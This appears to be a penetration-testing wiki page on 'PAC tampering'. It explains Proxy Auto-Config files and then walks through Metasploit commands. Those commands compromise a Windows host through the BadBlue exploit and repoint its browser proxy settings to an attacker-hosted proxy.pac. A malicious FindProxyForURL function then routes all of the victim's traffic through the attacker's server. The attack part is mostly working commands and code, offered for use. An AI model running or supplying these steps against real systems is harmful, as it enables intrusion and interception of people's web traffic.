👾PAC Tempering

Theory

Proxy Auto Config

A Proxy Auto-Configuration (PAC) file is a JavaScript function that determines if web browser requests go directly to the destination or are forwarded to a web proxy server. The PAC file contains a function called FindProxyForURL(url, host), which returns a string with one or more access methods. This function instructs a browser to forward traffic to a proxy server instead of directly to the destination server.

Some providers may offer a PAC web address, which enables auto proxy settings. However, in most cases, you'll need to change proxy settings manually. For example, a Google Chrome Android proxy works automatically.

Practical

PAC Tempering

Metasploit

Exploitation Phase

search badblue

use exploit/windows/http/badblue_passthru

show options

setg RHOSTS <remote ip>

Run

Post Exploitation Phase

search proxypac

use post/windows/manage/ie_proxypac

show options

set REMOTE PAC http://<attacker ip>/proxy.pac

set SESSION 1

run

# Create proxy.pac

nano proxy.pac

function FindProxyForURL(url,host)
{
    return "PROXY <Attacker IP>:80"
}

# Start Apache2 service
sudo servcie apache2 start

Note: You have to move the proxy.pac to /var/www/html

REFERENCES

https://54m4ri74n.medium.com/tampering-the-pac-post-exploit-windows-metasploit-4a9f52cd42c4

PreviousPrivilege escalation: Windows NextAmnesiac - EDR Bypass

Last updated 1 year ago

Was this helpful?